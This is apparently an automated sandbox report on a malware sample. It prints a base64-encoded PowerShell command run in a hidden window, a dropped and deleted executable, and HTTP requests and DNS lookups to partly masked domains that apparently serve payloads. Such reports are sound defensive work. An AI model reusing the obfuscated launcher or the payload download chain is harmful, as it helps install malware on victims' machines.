Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAGEAcwB1AHoAbgBiAGUAbwBhAGMAeQBuAD0AJwBEAHMAcQBlAGQAcQBoAGgAZAAnADsAJABZAHIAcQBpAGsAagBmAGkAegAgAD...
Modifies file system
Creates the following files
- %HOMEPATH%\895.exe
Deletes the following files
- %HOMEPATH%\895.exe
Network activity
TCP
HTTP GET requests
- http://fl#####ohonuicoc.com/wp-admin/js/widgets/h95du/
- http://www.mo####airparty.com/class.local/parts_service/D1CAv/
- http://la####feduweb.com/clients/9b4djrm/
UDP
- DNS ASK fl#####ohonuicoc.com
- DNS ASK ca####clubcisc.org
- DNS ASK mo####airparty.com
- DNS ASK bi###arati.com
- DNS ASK la####feduweb.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAGEAcwB1AHoAbgBiAGUAbwBhAGMAeQBuAD0AJwBEAHMAcQBlAGQAcQBoAGgAZAAnADsAJABZAHIAcQBpAGsAagBmAGkAegAgAD...' (with hidden window)
